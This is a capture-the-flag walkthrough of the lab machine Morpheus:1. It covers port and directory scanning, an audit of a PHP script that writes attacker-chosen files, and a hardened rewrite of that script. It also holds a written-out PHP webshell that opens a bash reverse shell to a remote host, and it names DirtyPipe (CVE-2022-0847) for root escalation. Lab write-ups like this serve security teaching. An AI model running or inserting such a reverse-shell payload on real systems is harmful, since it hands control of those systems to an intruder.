Key points
- SecLists wordlists
- gobuster
- PHP file write
- PEASS-ng privilege escalation helper
- CVE-2022-0847
Open ports
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open http nginx 1.18.0
Directory scan
gobuster combined with the SecLists wordlist collection
gobuster.exe dir -w directory-list-2.3-medium.txt -x php,txt -u http://192.168.78.154/
/index.php (Status: 200) [Size: 6]
/javascript (Status: 301) [Size: 321] [--> http://192.168.78.154/javascript/]
/robots.txt (Status: 200) [Size: 47]
/graffiti.php (Status: 200) [Size: 468]
/graffiti.txt (Status: 200) [Size: 142]
Visit the /graffiti.php file
The POST request carries a file parameter, which suggests a file read vulnerability. Change graffiti.txt to a .php file and try: the file can indeed be read.
Code audit
graffiti.php
When the POST parameter message is not empty, the script writes to the file named by the file parameter, then displays its contents.
<?php
$file = "graffiti.txt";                     // default target file
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['file'])) {
        $file = $_POST['file'];             // the client chooses the file name, including its extension
    }
    if (isset($_POST['message'])) {
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
        fwrite($handle, $_POST['message']); // the client chooses the content that gets written
        fwrite($handle, "\n");
        fclose($handle);                    // close the handle (the machine's copy mistakenly passes $file here)
    }
}
// Display file
$handle = fopen($file, "r");
while (!feof($handle)) {
    echo fgets($handle);
    echo "<br>\n";
}
fclose($handle);
?>
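For comparison, a hardened rewrite of graffiti.php as an added example (this is not the Morpheus:1 source): the file name is never taken from the request, the message is length-limited and written under a lock, and every displayed line is HTML-escaped. The fixed path and the 512-byte limit are assumptions.

```php
<?php
// Added example, not the machine's original graffiti.php.
// The client no longer chooses the file: the script always appends to one
// fixed .txt file, so no attacker-named .php file can be created.
$file   = __DIR__ . '/graffiti.txt';   // fixed path, never taken from $_POST (assumption)
$maxLen = 512;                         // constructed per-message size limit (assumption)

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['message'])) {
    $message = (string) $_POST['message'];
    // Reject overlong input and any control character other than newline/tab.
    if (strlen($message) > $maxLen || preg_match('/[^\P{C}\n\t]/u', $message)) {
        http_response_code(400);
        exit('Invalid message');
    }
    // LOCK_EX keeps concurrent requests from interleaving their writes.
    $ok = file_put_contents($file, $message . "\n", FILE_APPEND | LOCK_EX);
    if ($ok === false) {
        http_response_code(500);
        exit('Cannot write to file');
    }
}

// Display the file, escaping each line so stored content is rendered as text
// instead of being interpreted by the browser (stored XSS in the original).
$lines = @file($file, FILE_IGNORE_NEW_LINES);
if ($lines === false) {
    $lines = [];
}
foreach ($lines as $line) {
    echo htmlspecialchars($line, ENT_QUOTES | ENT_HTML5, 'UTF-8'), "<br>\n";
}
```

Keeping the data file outside the web root (or denying PHP execution for the directory) is a second layer on top of the fixed name.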
Writing a PHP file
Write a webshell and obtain a reverse shell. The PHP file written:
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/192.168.78.152/1234 0>&1'"); ?>
Privilege escalation
PEASS-ng privilege escalation helper
The scan flags a CVE usable for privilege escalation:
DirtyPipe CVE-2022-0847
Successfully escalated to root